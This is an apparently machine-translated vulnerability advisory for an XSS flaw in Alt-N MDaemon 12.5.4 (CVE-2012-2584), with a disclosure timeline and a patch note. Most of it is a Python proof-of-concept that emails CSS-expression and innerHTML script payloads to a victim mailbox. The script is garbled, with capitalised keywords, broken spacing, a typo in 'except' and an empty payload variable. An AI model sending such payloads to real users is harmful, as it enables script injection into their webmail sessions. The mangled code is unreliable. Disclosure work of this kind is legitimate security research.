Alt-N MDaemon Body HTML code injection vulnerability

Release date:
Updated on:

Affected Systems:
Alt-N MDaemon Free 12.5.4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54885
Cve id: CVE-2012-2584

Alt-N MDaemon is a Windows-based email service program, and WorldClient is its client.

Alt-N MDaemon 12.5.4 and other versions have the XSS vulnerability in implementation, through the CSS expression attributes in the email body, CSS comments in the STYLE attributes of the IMG element, CSS expression attributes, multiple CSS comments, and innerHTML attributes in the XML document, remote attackers can inject arbitrary Web scripts or HTML to affected sites.

<* Source: loneferret
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Daniel Kazimirow () provides the following test methods:

#! /Usr/bin/python

'''

Author: loneferret of Offensive Security
Product: Alt-N MDaemon Free
Version: 12.5.4
Vendor Site: http://www.altn.com/
Software Download: http://www.altn.com/Downloads/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
18 Jul 2012: Vendor requests additional information from CERT. CERT advises vendor to contact the researcher.
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window XP Pro SP3 (x86)
Browser Used: Internet Explorer 8

Injection Point: Body
Injection Payload (s ):
1: exp/* <xss style = 'no \ xss: noxss ("*//*");
Xss: & #101; x & # x2F; * XSS * // */expression (alert ("XSS") '>
2:
3: <HTML> <BODY>
<? Xml: namespace prefix = "t" ns = "urn: schemas-microsoft-com: time">
<? Import namespace = "t" implementation = "# default # time2">
<T: set attributeName = "innerHTML" to = "XSS <script defer> alert ('xss') </SCRIPT>"> </BODY> </HTML>

'''

Import smtplib, urllib2

Payload = " """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: XSS \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS" + payload + "\ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Alt-N
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.altn.com